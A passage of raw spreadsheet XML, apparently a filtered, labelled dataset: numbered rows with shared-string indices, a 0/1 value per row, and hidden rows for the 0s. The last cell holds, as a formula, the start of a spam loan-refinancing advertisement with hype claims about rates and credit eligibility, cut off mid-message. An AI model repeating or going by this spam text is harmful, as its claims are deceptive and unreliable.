    </row>
    <row r="2827" hidden="1">
      <c r="A2827" s="1">
        <v>2825.0</v>
      </c>
      <c r="B2827" s="1" t="s">
        <v>3643</v>
      </c>
      <c r="C2827" s="1" t="s">
        <v>4512</v>
      </c>
      <c r="D2827" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2828" hidden="1">
      <c r="A2828" s="1">
        <v>2826.0</v>
      </c>
      <c r="B2828" s="1" t="s">
        <v>4513</v>
      </c>
      <c r="C2828" s="1" t="s">
        <v>4514</v>
      </c>
      <c r="D2828" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2829">
      <c r="A2829" s="1">
        <v>2827.0</v>
      </c>
      <c r="B2829" s="1" t="s">
        <v>4515</v>
      </c>
      <c r="C2829" s="1" t="s">
        <v>4516</v>
      </c>
      <c r="D2829" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2830" hidden="1">
      <c r="A2830" s="1">
        <v>2828.0</v>
      </c>
      <c r="B2830" s="1" t="s">
        <v>4517</v>
      </c>
      <c r="C2830" s="1" t="s">
        <v>4518</v>
      </c>
      <c r="D2830" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2831" hidden="1">
      <c r="A2831" s="1">
        <v>2829.0</v>
      </c>
      <c r="B2831" s="1" t="s">
        <v>726</v>
      </c>
      <c r="C2831" s="1" t="s">
        <v>727</v>
      </c>
      <c r="D2831" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2832" hidden="1">
      <c r="A2832" s="1">
        <v>2830.0</v>
      </c>
      <c r="B2832" s="1" t="s">
        <v>4519</v>
      </c>
      <c r="C2832" s="1" t="s">
        <v>4520</v>
      </c>
      <c r="D2832" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2833" hidden="1">
      <c r="A2833" s="1">
        <v>2831.0</v>
      </c>
      <c r="B2833" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C2833" s="1" t="s">
        <v>4521</v>
      </c>
      <c r="D2833" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2834" hidden="1">
      <c r="A2834" s="1">
        <v>2832.0</v>
      </c>
      <c r="B2834" s="1" t="s">
        <v>282</v>
      </c>
      <c r="C2834" s="1" t="s">
        <v>4522</v>
      </c>
      <c r="D2834" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2835" hidden="1">
      <c r="A2835" s="1">
        <v>2833.0</v>
      </c>
      <c r="B2835" s="1" t="s">
        <v>4523</v>
      </c>
      <c r="C2835" s="1" t="s">
        <v>4524</v>
      </c>
      <c r="D2835" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2836" hidden="1">
      <c r="A2836" s="1">
        <v>2834.0</v>
      </c>
      <c r="B2836" s="1" t="s">
        <v>1941</v>
      </c>
      <c r="C2836" s="1" t="s">
        <v>1942</v>
      </c>
      <c r="D2836" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2837">
      <c r="A2837" s="1">
        <v>2835.0</v>
      </c>
      <c r="B2837" s="1" t="s">
        <v>4525</v>
      </c>
      <c r="C2837" s="1" t="s">
        <v>4526</v>
      </c>
      <c r="D2837" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2838">
      <c r="A2838" s="1">
        <v>2836.0</v>
      </c>
      <c r="B2838" s="1" t="s">
        <v>3582</v>
      </c>
      <c r="C2838" s="1" t="s">
        <v>4527</v>
      </c>
      <c r="D2838" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2839">
      <c r="A2839" s="1">
        <v>2837.0</v>
      </c>
      <c r="B2839" s="1" t="s">
        <v>4528</v>
      </c>
      <c r="C2839" s="1" t="s">
        <v>4529</v>
      </c>
      <c r="D2839" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2840" hidden="1">
      <c r="A2840" s="1">
        <v>2838.0</v>
      </c>
      <c r="B2840" s="1" t="s">
        <v>1370</v>
      </c>
      <c r="C2840" s="1" t="s">
        <v>1371</v>
      </c>
      <c r="D2840" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2841" hidden="1">
      <c r="A2841" s="1">
        <v>2839.0</v>
      </c>
      <c r="B2841" s="1" t="s">
        <v>4530</v>
      </c>
      <c r="C2841" s="1" t="s">
        <v>4531</v>
      </c>
      <c r="D2841" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2842" hidden="1">
      <c r="A2842" s="1">
        <v>2840.0</v>
      </c>
      <c r="B2842" s="1" t="s">
        <v>607</v>
      </c>
      <c r="C2842" s="1" t="s">
        <v>4532</v>
      </c>
      <c r="D2842" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2843" hidden="1">
      <c r="A2843" s="1">
        <v>2841.0</v>
      </c>
      <c r="B2843" s="1" t="s">
        <v>4533</v>
      </c>
      <c r="C2843" s="1" t="s">
        <v>4534</v>
      </c>
      <c r="D2843" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2844">
      <c r="A2844" s="1">
        <v>2842.0</v>
      </c>
      <c r="B2844" s="1" t="s">
        <v>4535</v>
      </c>
      <c r="C2844" s="1" t="s">
        <v>4536</v>
      </c>
      <c r="D2844" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2845" hidden="1">
      <c r="A2845" s="1">
        <v>2843.0</v>
      </c>
      <c r="B2845" s="1" t="s">
        <v>401</v>
      </c>
      <c r="C2845" s="1" t="s">
        <v>402</v>
      </c>
      <c r="D2845" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2846">
      <c r="A2846" s="1">
        <v>2844.0</v>
      </c>
      <c r="B2846" s="1" t="s">
        <v>4537</v>
      </c>
      <c r="C2846" s="1" t="s">
        <v>4538</v>
      </c>
      <c r="D2846" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2847" hidden="1">
      <c r="A2847" s="1">
        <v>2845.0</v>
      </c>
      <c r="B2847" s="1" t="s">
        <v>1562</v>
      </c>
      <c r="C2847" s="1" t="s">
        <v>4506</v>
      </c>
      <c r="D2847" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2848" hidden="1">
      <c r="A2848" s="1">
        <v>2846.0</v>
      </c>
      <c r="B2848" s="1" t="s">
        <v>4539</v>
      </c>
      <c r="C2848" s="1" t="s">
        <v>4540</v>
      </c>
      <c r="D2848" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2849" hidden="1">
      <c r="A2849" s="1">
        <v>2847.0</v>
      </c>
      <c r="B2849" s="1" t="s">
        <v>4541</v>
      </c>
      <c r="C2849" s="1" t="s">
        <v>4542</v>
      </c>
      <c r="D2849" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2850" hidden="1">
      <c r="A2850" s="1">
        <v>2848.0</v>
      </c>
      <c r="B2850" s="1" t="s">
        <v>957</v>
      </c>
      <c r="C2850" s="1" t="s">
        <v>3862</v>
      </c>
      <c r="D2850" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2851" hidden="1">
      <c r="A2851" s="1">
        <v>2849.0</v>
      </c>
      <c r="B2851" s="1" t="s">
        <v>4543</v>
      </c>
      <c r="C2851" s="1" t="s">
        <v>4544</v>
      </c>
      <c r="D2851" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2852">
      <c r="A2852" s="1">
        <v>2850.0</v>
      </c>
      <c r="B2852" s="1" t="s">
        <v>4545</v>
      </c>
      <c r="C2852" s="1" t="s">
        <v>4546</v>
      </c>
      <c r="D2852" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2853" hidden="1">
      <c r="A2853" s="1">
        <v>2851.0</v>
      </c>
      <c r="B2853" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C2853" s="1" t="s">
        <v>4067</v>
      </c>
      <c r="D2853" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2854" hidden="1">
      <c r="A2854" s="1">
        <v>2852.0</v>
      </c>
      <c r="B2854" s="1" t="s">
        <v>4547</v>
      </c>
      <c r="C2854" s="1" t="s">
        <v>4548</v>
      </c>
      <c r="D2854" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2855" hidden="1">
      <c r="A2855" s="1">
        <v>2853.0</v>
      </c>
      <c r="B2855" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C2855" s="1" t="s">
        <v>4549</v>
      </c>
      <c r="D2855" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2856" hidden="1">
      <c r="A2856" s="1">
        <v>2854.0</v>
      </c>
      <c r="B2856" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="C2856" s="1" t="s">
        <v>4550</v>
      </c>
      <c r="D2856" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2857" hidden="1">
      <c r="A2857" s="1">
        <v>2855.0</v>
      </c>
      <c r="B2857" s="1" t="s">
        <v>4551</v>
      </c>
      <c r="C2857" s="1" t="s">
        <v>4552</v>
      </c>
      <c r="D2857" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2858">
      <c r="A2858" s="1">
        <v>2856.0</v>
      </c>
      <c r="B2858" s="1" t="s">
        <v>1062</v>
      </c>
      <c r="C2858" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="D2858" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2859" hidden="1">
      <c r="A2859" s="1">
        <v>2857.0</v>
      </c>
      <c r="B2859" s="1" t="s">
        <v>2571</v>
      </c>
      <c r="C2859" s="1" t="s">
        <v>4553</v>
      </c>
      <c r="D2859" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2860" hidden="1">
      <c r="A2860" s="1">
        <v>2858.0</v>
      </c>
      <c r="B2860" s="1" t="s">
        <v>214</v>
      </c>
      <c r="C2860" s="1" t="s">
        <v>4554</v>
      </c>
      <c r="D2860" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2861">
      <c r="A2861" s="1">
        <v>2859.0</v>
      </c>
      <c r="B2861" s="1" t="s">
        <v>4555</v>
      </c>
      <c r="C2861" s="1" t="s">
        <v>4556</v>
      </c>
      <c r="D2861" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2862">
      <c r="A2862" s="1">
        <v>2860.0</v>
      </c>
      <c r="B2862" s="1" t="s">
        <v>4557</v>
      </c>
      <c r="C2862" s="1" t="s">
        <v>4558</v>
      </c>
      <c r="D2862" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2863" hidden="1">
      <c r="A2863" s="1">
        <v>2861.0</v>
      </c>
      <c r="B2863" s="1" t="s">
        <v>4559</v>
      </c>
      <c r="C2863" s="1" t="s">
        <v>4560</v>
      </c>
      <c r="D2863" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2864">
      <c r="A2864" s="1">
        <v>2862.0</v>
      </c>
      <c r="B2864" s="1" t="s">
        <v>1569</v>
      </c>
      <c r="C2864" s="1" t="s">
        <v>1570</v>
      </c>
      <c r="D2864" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2865">
      <c r="A2865" s="1">
        <v>2863.0</v>
      </c>
      <c r="B2865" s="1" t="s">
        <v>4561</v>
      </c>
      <c r="C2865" s="1" t="s">
        <v>4562</v>
      </c>
      <c r="D2865" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2866" hidden="1">
      <c r="A2866" s="1">
        <v>2864.0</v>
      </c>
      <c r="B2866" s="1" t="s">
        <v>4563</v>
      </c>
      <c r="C2866" s="1" t="s">
        <v>4564</v>
      </c>
      <c r="D2866" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2867" hidden="1">
      <c r="A2867" s="1">
        <v>2865.0</v>
      </c>
      <c r="B2867" s="1" t="s">
        <v>257</v>
      </c>
      <c r="C2867" s="1" t="s">
        <v>4565</v>
      </c>
      <c r="D2867" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2868" hidden="1">
      <c r="A2868" s="1">
        <v>2866.0</v>
      </c>
      <c r="B2868" s="1" t="s">
        <v>4566</v>
      </c>
      <c r="C2868" s="1" t="s">
        <v>4567</v>
      </c>
      <c r="D2868" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2869" hidden="1">
      <c r="A2869" s="1">
        <v>2867.0</v>
      </c>
      <c r="B2869" s="1" t="s">
        <v>902</v>
      </c>
      <c r="C2869" s="1" t="s">
        <v>4568</v>
      </c>
      <c r="D2869" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2870" hidden="1">
      <c r="A2870" s="1">
        <v>2868.0</v>
      </c>
      <c r="B2870" s="1" t="s">
        <v>1862</v>
      </c>
      <c r="C2870" s="1" t="s">
        <v>1863</v>
      </c>
      <c r="D2870" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2871">
      <c r="A2871" s="1">
        <v>2869.0</v>
      </c>
      <c r="B2871" s="1" t="s">
        <v>3668</v>
      </c>
      <c r="C2871" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="D2871" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2872">
      <c r="A2872" s="1">
        <v>2870.0</v>
      </c>
      <c r="B2872" s="1" t="s">
        <v>4569</v>
      </c>
      <c r="C2872" s="1" t="s">
        <v>4570</v>
      </c>
      <c r="D2872" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2873" hidden="1">
      <c r="A2873" s="1">
        <v>2871.0</v>
      </c>
      <c r="B2873" s="1" t="s">
        <v>4473</v>
      </c>
      <c r="C2873" s="1" t="s">
        <v>4474</v>
      </c>
      <c r="D2873" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2874" hidden="1">
      <c r="A2874" s="1">
        <v>2872.0</v>
      </c>
      <c r="B2874" s="1" t="s">
        <v>4571</v>
      </c>
      <c r="C2874" s="1" t="s">
        <v>4572</v>
      </c>
      <c r="D2874" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2875" hidden="1">
      <c r="A2875" s="1">
        <v>2873.0</v>
      </c>
      <c r="B2875" s="1" t="s">
        <v>4573</v>
      </c>
      <c r="C2875" s="1" t="s">
        <v>4574</v>
      </c>
      <c r="D2875" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2876" hidden="1">
      <c r="A2876" s="1">
        <v>2874.0</v>
      </c>
      <c r="B2876" s="1" t="s">
        <v>4575</v>
      </c>
      <c r="C2876" s="1" t="s">
        <v>4576</v>
      </c>
      <c r="D2876" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2877">
      <c r="A2877" s="1">
        <v>2875.0</v>
      </c>
      <c r="B2877" s="1" t="s">
        <v>4577</v>
      </c>
      <c r="C2877" s="1" t="s">
        <v>4578</v>
      </c>
      <c r="D2877" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2878" hidden="1">
      <c r="A2878" s="1">
        <v>2876.0</v>
      </c>
      <c r="B2878" s="1" t="s">
        <v>3973</v>
      </c>
      <c r="C2878" s="1" t="s">
        <v>4579</v>
      </c>
      <c r="D2878" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2879" hidden="1">
      <c r="A2879" s="1">
        <v>2877.0</v>
      </c>
      <c r="B2879" s="1" t="s">
        <v>4580</v>
      </c>
      <c r="C2879" s="1" t="s">
        <v>4581</v>
      </c>
      <c r="D2879" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2880">
      <c r="A2880" s="1">
        <v>2878.0</v>
      </c>
      <c r="B2880" s="1" t="s">
        <v>4582</v>
      </c>
      <c r="C2880" s="1" t="s">
        <v>4583</v>
      </c>
      <c r="D2880" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2881" hidden="1">
      <c r="A2881" s="1">
        <v>2879.0</v>
      </c>
      <c r="B2881" s="1" t="s">
        <v>4584</v>
      </c>
      <c r="C2881" s="1" t="s">
        <v>4585</v>
      </c>
      <c r="D2881" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2882" hidden="1">
      <c r="A2882" s="1">
        <v>2880.0</v>
      </c>
      <c r="B2882" s="1" t="s">
        <v>4586</v>
      </c>
      <c r="C2882" s="1" t="s">
        <v>4587</v>
      </c>
      <c r="D2882" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2883" hidden="1">
      <c r="A2883" s="1">
        <v>2881.0</v>
      </c>
      <c r="B2883" s="1" t="s">
        <v>4588</v>
      </c>
      <c r="C2883" s="1" t="s">
        <v>4589</v>
      </c>
      <c r="D2883" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2884" hidden="1">
      <c r="A2884" s="1">
        <v>2882.0</v>
      </c>
      <c r="B2884" s="1" t="s">
        <v>4590</v>
      </c>
      <c r="C2884" s="1" t="s">
        <v>4591</v>
      </c>
      <c r="D2884" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2885" hidden="1">
      <c r="A2885" s="1">
        <v>2883.0</v>
      </c>
      <c r="B2885" s="1" t="s">
        <v>4592</v>
      </c>
      <c r="C2885" s="1" t="s">
        <v>4593</v>
      </c>
      <c r="D2885" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2886" hidden="1">
      <c r="A2886" s="1">
        <v>2884.0</v>
      </c>
      <c r="B2886" s="1" t="s">
        <v>2311</v>
      </c>
      <c r="C2886" s="1" t="s">
        <v>2312</v>
      </c>
      <c r="D2886" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2887" hidden="1">
      <c r="A2887" s="1">
        <v>2885.0</v>
      </c>
      <c r="B2887" s="1" t="s">
        <v>1025</v>
      </c>
      <c r="C2887" s="1" t="s">
        <v>4594</v>
      </c>
      <c r="D2887" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2888" hidden="1">
      <c r="A2888" s="1">
        <v>2886.0</v>
      </c>
      <c r="B2888" s="1" t="s">
        <v>4507</v>
      </c>
      <c r="C2888" s="1" t="s">
        <v>4508</v>
      </c>
      <c r="D2888" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2889" hidden="1">
      <c r="A2889" s="1">
        <v>2887.0</v>
      </c>
      <c r="B2889" s="1" t="s">
        <v>2370</v>
      </c>
      <c r="C2889" s="1" t="s">
        <v>4595</v>
      </c>
      <c r="D2889" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2890" hidden="1">
      <c r="A2890" s="1">
        <v>2888.0</v>
      </c>
      <c r="B2890" s="1" t="s">
        <v>811</v>
      </c>
      <c r="C2890" s="1" t="s">
        <v>4596</v>
      </c>
      <c r="D2890" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2891">
      <c r="A2891" s="1">
        <v>2889.0</v>
      </c>
      <c r="B2891" s="1" t="s">
        <v>4597</v>
      </c>
      <c r="C2891" s="1" t="s">
        <v>4598</v>
      </c>
      <c r="D2891" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2892">
      <c r="A2892" s="1">
        <v>2890.0</v>
      </c>
      <c r="B2892" s="1" t="s">
        <v>4599</v>
      </c>
      <c r="C2892" s="1" t="s">
        <v>4600</v>
      </c>
      <c r="D2892" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2893">
      <c r="A2893" s="1">
        <v>2891.0</v>
      </c>
      <c r="B2893" s="1" t="s">
        <v>4601</v>
      </c>
      <c r="C2893" s="1" t="s">
        <v>4602</v>
      </c>
      <c r="D2893" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2894" hidden="1">
      <c r="A2894" s="1">
        <v>2892.0</v>
      </c>
      <c r="B2894" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C2894" s="1" t="s">
        <v>4603</v>
      </c>
      <c r="D2894" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2895">
      <c r="A2895" s="1">
        <v>2893.0</v>
      </c>
      <c r="B2895" s="1" t="s">
        <v>1100</v>
      </c>
      <c r="C2895" s="1" t="s">
        <v>1101</v>
      </c>
      <c r="D2895" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2896" hidden="1">
      <c r="A2896" s="1">
        <v>2894.0</v>
      </c>
      <c r="B2896" s="1" t="s">
        <v>4604</v>
      </c>
      <c r="C2896" s="1" t="s">
        <v>4605</v>
      </c>
      <c r="D2896" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2897" hidden="1">
      <c r="A2897" s="1">
        <v>2895.0</v>
      </c>
      <c r="B2897" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C2897" s="1" t="s">
        <v>4606</v>
      </c>
      <c r="D2897" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2898" hidden="1">
      <c r="A2898" s="1">
        <v>2896.0</v>
      </c>
      <c r="B2898" s="1" t="s">
        <v>2890</v>
      </c>
      <c r="C2898" s="1" t="s">
        <v>2891</v>
      </c>
      <c r="D2898" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2899">
      <c r="A2899" s="1">
        <v>2897.0</v>
      </c>
      <c r="B2899" s="1" t="s">
        <v>4607</v>
      </c>
      <c r="C2899" s="1" t="s">
        <v>4608</v>
      </c>
      <c r="D2899" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2900" hidden="1">
      <c r="A2900" s="1">
        <v>2898.0</v>
      </c>
      <c r="B2900" s="1" t="s">
        <v>1183</v>
      </c>
      <c r="C2900" s="1" t="s">
        <v>1479</v>
      </c>
      <c r="D2900" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2901">
      <c r="A2901" s="1">
        <v>2899.0</v>
      </c>
      <c r="B2901" s="1" t="s">
        <v>4609</v>
      </c>
      <c r="C2901" s="1" t="s">
        <v>4610</v>
      </c>
      <c r="D2901" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2902">
      <c r="A2902" s="1">
        <v>2900.0</v>
      </c>
      <c r="B2902" s="1" t="s">
        <v>4611</v>
      </c>
      <c r="C2902" s="1" t="s">
        <v>4612</v>
      </c>
      <c r="D2902" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2903">
      <c r="A2903" s="1">
        <v>2901.0</v>
      </c>
      <c r="B2903" s="1" t="s">
        <v>4613</v>
      </c>
      <c r="C2903" s="1" t="s">
        <v>4614</v>
      </c>
      <c r="D2903" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2904" hidden="1">
      <c r="A2904" s="1">
        <v>2902.0</v>
      </c>
      <c r="B2904" s="1" t="s">
        <v>4615</v>
      </c>
      <c r="C2904" s="1" t="s">
        <v>4616</v>
      </c>
      <c r="D2904" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2905" hidden="1">
      <c r="A2905" s="1">
        <v>2903.0</v>
      </c>
      <c r="B2905" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C2905" s="1" t="s">
        <v>4617</v>
      </c>
      <c r="D2905" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2906" hidden="1">
      <c r="A2906" s="1">
        <v>2904.0</v>
      </c>
      <c r="B2906" s="1" t="s">
        <v>187</v>
      </c>
      <c r="C2906" s="1" t="s">
        <v>4618</v>
      </c>
      <c r="D2906" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2907" hidden="1">
      <c r="A2907" s="1">
        <v>2905.0</v>
      </c>
      <c r="B2907" s="1" t="s">
        <v>2530</v>
      </c>
      <c r="C2907" s="1" t="s">
        <v>2531</v>
      </c>
      <c r="D2907" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2908" hidden="1">
      <c r="A2908" s="1">
        <v>2906.0</v>
      </c>
      <c r="B2908" s="1" t="s">
        <v>1963</v>
      </c>
      <c r="C2908" s="1" t="s">
        <v>1964</v>
      </c>
      <c r="D2908" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2909" hidden="1">
      <c r="A2909" s="1">
        <v>2907.0</v>
      </c>
      <c r="B2909" s="1" t="s">
        <v>3384</v>
      </c>
      <c r="C2909" s="1" t="s">
        <v>4619</v>
      </c>
      <c r="D2909" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2910" hidden="1">
      <c r="A2910" s="1">
        <v>2908.0</v>
      </c>
      <c r="B2910" s="1" t="s">
        <v>300</v>
      </c>
      <c r="C2910" s="1" t="s">
        <v>4620</v>
      </c>
      <c r="D2910" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2911" hidden="1">
      <c r="A2911" s="1">
        <v>2909.0</v>
      </c>
      <c r="B2911" s="1" t="s">
        <v>418</v>
      </c>
      <c r="C2911" s="1" t="s">
        <v>4621</v>
      </c>
      <c r="D2911" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2912">
      <c r="A2912" s="1">
        <v>2910.0</v>
      </c>
      <c r="B2912" s="1" t="s">
        <v>4622</v>
      </c>
      <c r="C2912" s="1" t="s">
        <v>4623</v>
      </c>
      <c r="D2912" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2913" hidden="1">
      <c r="A2913" s="1">
        <v>2911.0</v>
      </c>
      <c r="B2913" s="1" t="s">
        <v>1979</v>
      </c>
      <c r="C2913" s="1" t="s">
        <v>4624</v>
      </c>
      <c r="D2913" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2914" hidden="1">
      <c r="A2914" s="1">
        <v>2912.0</v>
      </c>
      <c r="B2914" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C2914" s="1" t="s">
        <v>4358</v>
      </c>
      <c r="D2914" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2915" hidden="1">
      <c r="A2915" s="1">
        <v>2913.0</v>
      </c>
      <c r="B2915" s="1" t="s">
        <v>1979</v>
      </c>
      <c r="C2915" s="1" t="s">
        <v>1980</v>
      </c>
      <c r="D2915" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2916" hidden="1">
      <c r="A2916" s="1">
        <v>2914.0</v>
      </c>
      <c r="B2916" s="1" t="s">
        <v>4625</v>
      </c>
      <c r="C2916" s="1" t="s">
        <v>4626</v>
      </c>
      <c r="D2916" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2917" hidden="1">
      <c r="A2917" s="1">
        <v>2915.0</v>
      </c>
      <c r="B2917" s="1" t="s">
        <v>4627</v>
      </c>
      <c r="C2917" s="1" t="s">
        <v>4628</v>
      </c>
      <c r="D2917" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2918">
      <c r="A2918" s="1">
        <v>2916.0</v>
      </c>
      <c r="B2918" s="1" t="s">
        <v>4629</v>
      </c>
      <c r="C2918" s="1" t="s">
        <v>4630</v>
      </c>
      <c r="D2918" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2919" hidden="1">
      <c r="A2919" s="1">
        <v>2917.0</v>
      </c>
      <c r="B2919" s="1" t="s">
        <v>4625</v>
      </c>
      <c r="C2919" s="1" t="s">
        <v>4626</v>
      </c>
      <c r="D2919" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2920" hidden="1">
      <c r="A2920" s="1">
        <v>2918.0</v>
      </c>
      <c r="B2920" s="1" t="s">
        <v>4631</v>
      </c>
      <c r="C2920" s="1" t="s">
        <v>4632</v>
      </c>
      <c r="D2920" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2921">
      <c r="A2921" s="1">
        <v>2919.0</v>
      </c>
      <c r="B2921" s="1" t="s">
        <v>4633</v>
      </c>
      <c r="C2921" s="1" t="s">
        <v>4634</v>
      </c>
      <c r="D2921" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2922" hidden="1">
      <c r="A2922" s="1">
        <v>2920.0</v>
      </c>
      <c r="B2922" s="1" t="s">
        <v>1365</v>
      </c>
      <c r="C2922" s="1" t="s">
        <v>4635</v>
      </c>
      <c r="D2922" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2923" hidden="1">
      <c r="A2923" s="1">
        <v>2921.0</v>
      </c>
      <c r="B2923" s="1" t="s">
        <v>582</v>
      </c>
      <c r="C2923" s="1" t="s">
        <v>4636</v>
      </c>
      <c r="D2923" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2924" hidden="1">
      <c r="A2924" s="1">
        <v>2922.0</v>
      </c>
      <c r="B2924" s="1" t="s">
        <v>4637</v>
      </c>
      <c r="C2924" s="1" t="s">
        <v>4638</v>
      </c>
      <c r="D2924" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2925" hidden="1">
      <c r="A2925" s="1">
        <v>2923.0</v>
      </c>
      <c r="B2925" s="1" t="s">
        <v>4639</v>
      </c>
      <c r="C2925" s="1" t="s">
        <v>4640</v>
      </c>
      <c r="D2925" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2926" hidden="1">
      <c r="A2926" s="1">
        <v>2924.0</v>
      </c>
      <c r="B2926" s="1" t="s">
        <v>1621</v>
      </c>
      <c r="C2926" s="1" t="s">
        <v>1622</v>
      </c>
      <c r="D2926" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2927" hidden="1">
      <c r="A2927" s="1">
        <v>2925.0</v>
      </c>
      <c r="B2927" s="1" t="s">
        <v>1102</v>
      </c>
      <c r="C2927" s="1" t="s">
        <v>2335</v>
      </c>
      <c r="D2927" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2928" hidden="1">
      <c r="A2928" s="1">
        <v>2926.0</v>
      </c>
      <c r="B2928" s="1" t="s">
        <v>1333</v>
      </c>
      <c r="C2928" s="1" t="s">
        <v>4641</v>
      </c>
      <c r="D2928" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2929">
      <c r="A2929" s="1">
        <v>2927.0</v>
      </c>
      <c r="B2929" s="1" t="s">
        <v>4642</v>
      </c>
      <c r="C2929" s="3" t="str">
        <f>=========================================================================
 Now you can have HUNDREDS of lenders compete for your loan!
 FACT: Interest Rates are at their lowest point in 40 years!
 You're eligible even with less than perfect credit !!
 	* Refinancing
